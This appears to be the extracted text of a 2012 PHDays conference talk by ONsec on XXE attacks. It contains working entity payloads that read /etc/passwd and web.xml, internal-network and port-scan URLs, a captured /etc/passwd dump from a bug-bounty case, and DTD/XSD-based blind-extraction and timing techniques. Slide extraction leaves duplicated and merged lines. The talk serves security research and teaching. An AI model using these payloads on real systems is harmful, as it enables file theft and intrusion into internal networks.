ONsec PHDays 2012 XXE incapsulated report

Attacks against Microsoft network web clientsPHDays, Russia, Moscow, 31/05/2012

Author bio@d0znpp, d0znpp@onsec.ru

•Have engaged in research in the field of web application security (since 2004);•Founder and security expert of ONsec company (since 2009); •Now days: development of self-learning systems for the detection of attacks on web applications and heuristic analysis. 

MS network under attack

• Trusted domain

• Same Origin Policy on trusted domain

• Local network area

• Security policy

• Bypass “no-proxy for local addresses”

• Profit

Blind XXE exploitationPHDays, Russia, Moscow, 31/05/2012

Good morning. Wake up, 0day

PostgreSQL all versions (8.4.11 debian 4.4.5-

8 tested)

xmlparse(document ‘<!DOCTYPE c [ <!

ENTITY a SYSTEM

"http://172.28.202.20/">]><c>&a</c>');

Good morning. Wake up, 0day

PostgreSQL all versions (8.4.11 debian 4.4.5-

8 tested)

No way to read content from entity, but…ERROR: invalid XML document

ПОДРОБНО: http://172.28.202.20/:1: parser error : StartTag: invalid element name

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"

"http://www.w3.org/TR/x

^

http://172.28.202.20/:139: parser error : AttValue: " or ' expected

<img src='http://seclog.ru/main/logo.php' width=0 height=0/>

XXE basics

Parser bug (feature)

•To read local files

•To make DoS (by reading /dev/zero loops)

<?xml encoding='utf-8' ?>

<!DOCTYPE a [<!ENTITY e SYSTEM

'/etc/paswd'> ]>

<a>&e;</a>

XXE applications

• Local files

• Internel network resources

• Port scan (http://192.168.0.1:22/)

• MS Windows network resources (\\ad\C$)

• Wrappers (ldap:// in perl, expect:// ssh2://

etc.)

Classic XXE vuln• Based on web application error messages,

such as:“Unknown language DATA”“Login DATA are not valid”“Password for user DATA does not match”

• Could not provide reading of files with non-valid characters, such as 0x02 < > etc.

Vuln which won a “Month of Yandex bugs hunting“ contest$ ./xxe-direct.pl --file=“/etc/passwd”<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:namesp2="http://namespaces.soaplite.com/perl" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:namesp84="http://xml.apache.org/xml-soap" xmlns:xsd="http://www.w3.org/2001/XMLSchema" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV: Body><SOAP-ENV:Fault><faultcode xsi:type="xsd:string">SOAP-ENV:511</faultcode><faultstring xsi:type="xsd:string">Unknown language</faultstring><detail xsi:type="xsd:string">Unknown language root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/sh

What is wrong?• Webapp may not display error messages• You may want to get XML file contents in

Java

Interesting XMLs:•web.xml•tomcat-users.xml•jetty.xml•http.conf (malformed)

PHP way to read anything• PHP wrapper provide a filter functionalphp://filter/convert.base64-encode/

resource=web.xml

• Then need to display an error messages too

What is blind?• Use DTD and XSD validations

• Get a validation result (status or errors)

• Use bruteforce, regexp, binary search and error message information (error-based) to read external XML structure and data

DTD based attack formula

XMLinp = DTDint + XMLint + XMLext

V(XMLinp,DTDint)=V(XMLint,DTDint) && V(XMLext,DTDint)

XMLinp – input XML stream

DTDint – internal DTD schema

XMLint - internal XML structure

XMLext – external XML (XML to read)

V(xml,schema) – validation function, which returned a validation status (error message or boolean)

DTD based attack: from idea to schema

<?xml version=“1.0” ?>

<!ENTITY ext SYSTEM “web.xml”><!ELEMENT root (secret+)><!ELEMENT secret (any+)><!ELEMENT any (#PCDATA)>

<root>&ext;<secret><any>data</any></secret></root>

<?xml version=“1.0” ?>

<!ENTITY ext SYSTEM “web.xml”><!ELEMENT root (secret+)><!ELEMENT secret (any+)><!ELEMENT any (#PCDATA)>

<root>&ext;<secret><any>data</any></secret></root>

Input.xml

<?xml version=“1.0”?><secret><any>data</any></secret>

<?xml version=“1.0”?><secret><any>data</any></secret>

Web.xml

XML validation error

Example #1. Read attribute value<!ATTLIST key id (a|b) #REQUIRED ><key id=“secret”></key>

Value "secret" for attribute id of mountain is not among the enumerated set in //LibXML

Attribute "key" with value "secret" must have a value from the list "a b ". //Xerces

Example #2. Brute external XML tag<!ENTITY a SYSTEM "web.xml"><!ELEMENT ext(root+)>]><ext>&a;</ext> -- > OK<!ENTITY a SYSTEM "web.xml"><!ELEMENT ext(foobar+)>]><ext>&a;</ext> -- > Element ext content does not follow the DTD, expecting (root)+, got (CDATA ) //LibXML PHP

Example #3.Read external XML(Java)factory.setValidating(true);//SAXParserFactory or DocumentBuilderFactory<!DOCTYPE root [<!ELEMENT root (foo+)><!ENTITY a SYSTEM ’web.xml'>]><root>&a;</root>Element type ”bar" must be declared.Where is “bar” tag? “Bar” in web.xml!

Problems of DTD based attacks• Example #3 doesn’t work in LibXML PHP ;( Only first tag name can be readed (Example #2)

from DOM object in PHP (library’s bug).

• DTD can’t be used to determine tag values (only tag names, document structure and attribute values)

• Bruteforce required if errors are not displayed

• Malformed XML such as http.conf can’t be readed

XSD based attack formulaXMLinp = DTDinp + XSDinp + XMLint + XMLext

V(XMLinp,DTDinp,XSDinp) = V(XMLint,DTDinp,XSDinp) && V(XMLext,DTDinp,XSDinp)

XMLinp – input XML streamDTDinp – input DTD schemaXSDinp –input XSD schemaXMLint - internal XML structureXMLext – external XML (XML to read)V(xml,dtd,xsd) – validation function, which returned a validation status (error message or boolean)

XSD based attack: from idea to schema

<?xml version=“1.0” ?>

<!ENTITY ext SYSTEM “web.xml”><root xsi:noNamespaceSchemaLocation = ”http://myhost/int.xsd”>

&ext;<secret><any>data</any></secret></root>

<?xml version=“1.0” ?>

<!ENTITY ext SYSTEM “web.xml”><root xsi:noNamespaceSchemaLocation = ”http://myhost/int.xsd”>

&ext;<secret><any>data</any></secret></root>

Input.xml

<?xml version=“1.0”?><secret><any>data</any></secret>

<?xml version=“1.0”?><secret><any>data</any></secret>

Web.xml

XML validation error

Example #4. Read tag values (XSD)parser.setProperty("http://java.sun.com/xml/jaxp/properties/schemaLanguage","http://www.w3.org/2001/XMLSchema"); //SAXParserFactory or DocumentBuilderFactory<!ENTITY ext SYSTEM “web.xml”><contacts xsi:noNamespaceSchemaLocation=”int.xsd”> <xs:element name=”password" type="xs:int"/>

cvc-datatype-valid.1.2.1: ’Secret' is not a valid value for 'integer'.cvc-type.3.1.3: The value ’Secret' of element ’password' is not valid.//Xerces

Binary search basics

a-n?a-n?

m-z?m-z? a-h?a-h?

a-e?a-e? h-n?h-n?

Faster binary search• Phonetic chains• Probability with which one letter follows another

one• Based of phonetics features of languages• Can be used to make text reading by binary

search fasterhttp://exploit-db.com/papers/13969/

Example #5. Binary search for tag value (XSD)<xs:element name="password" type="PWD"/>…<xs:simpleType name=”PWD"> <xs:restriction base="xs:token"> <xs:pattern value=”[a-m]{1}[a-z]+"/> </xs:restriction></xs:simpleType>

If first character of password tag value between “a” and “m” validation will true, else – false

And what about attacks without validation status?

• Use something like time-based attacks!

• XSD parser validate all tags even else some of

them already not valid

• Parser != Interpreter

• What we can do in that case?

Example #6. 2blind attacks

<xs:element name=”secret"> <xs:complexType> <xs:choice> <xs:group ref=”conditionGrp"/> <xs:group ref=”highloadGrp"/> </xs:choice> </xs:complexType> </xs:element>

If value of secret tag approach to conditionGrp parser doesn’t execute regexp from highloadGrp.

Then you should do highloadGrp regexp really difficult ;)

Problems of XSD based attacks

• Internal XSD validation is rare in a wild

• Only 4% of all webapps with XXE vulns make

that*

• Could not be used to read malformed XML, such

as httpd.conf

* By our stats from security audits since 2009

???PHDays, Russia, Moscow, 31/05/2012

@d0znppd0znpp@onsec.ru